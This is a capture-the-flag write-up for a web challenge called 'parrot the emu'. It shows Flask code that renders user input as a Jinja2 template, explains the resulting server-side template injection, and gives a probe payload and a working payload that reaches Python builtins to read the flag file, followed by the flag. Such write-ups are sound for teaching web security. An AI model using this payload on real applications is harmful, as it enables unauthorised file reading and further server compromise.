parrot the emu

by sealldev

Description

It is so nice to hear Parrot the Emu talk back

Original Writeup on seall.dev

We are given web source and an instance. The website reflects what you type:

[Screenshot: parrottheemu]

Looking in the source code, this is the interesting part:

from flask import request, render_template_string
...
    if request.method == 'POST':
        user_input = request.form.get('user_input')
        try:
            # user_input is used as the template itself, not as data: this is the SSTI sink
            result = render_template_string(user_input)
        except Exception as e:
            result = str(e)
...

render_template_string is dangerous with unvalidated user input because the input is parsed and executed as a Jinja2 template rather than shown as text, which makes it vulnerable to server-side template injection (SSTI). Since this is a Python (Flask) app, Jinja2 SSTI is the obvious place to start.

I first tried the payload {{7*7}} and the parrot responded with 49, perfect!

Now we need to read the flag file. I tried various payloads and found that this one works: {{ get_flashed_messages.__globals__.__builtins__.open("./flag").read() }}

[Screenshot: parrottheemusolve]

Flag: DUCTF{PaRrOt_EmU_ReNdErS_AnYtHiNg}
